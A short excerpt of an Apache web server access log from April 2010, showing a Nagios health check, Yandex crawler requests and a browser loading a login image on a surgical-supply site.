209.59.12.99 - - [07/Apr/2010:06:35:01 -0400] "GET / HTTP/1.0" 200 409 "-" "check_http/1.81 (nagios-plugins 1.4)"
95.108.128.242 - - [07/Apr/2010:06:35:59 -0400] "GET /logs/access_log.Q108061700 HTTP/1.1" 404 224 "-" "Yandex/1.01.001 (compatible; Win16; I)"
95.108.128.242 - - [07/Apr/2010:06:40:00 -0400] "GET /images/_notes/circle_log_in_over.jpg.mno HTTP/1.1" 200 250 "-" "Yandex/1.01.001 (compatible; Win16; I)"
85.243.101.213 - - [07/Apr/2010:06:40:02 -0400] "GET /images/login_go.gif HTTP/1.1" 200 296 "http://www.acesurgical.com/home.html" "Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET CLR 3.0.30618; InfoPath.2; Media Center PC 5.0; SLCC1)"
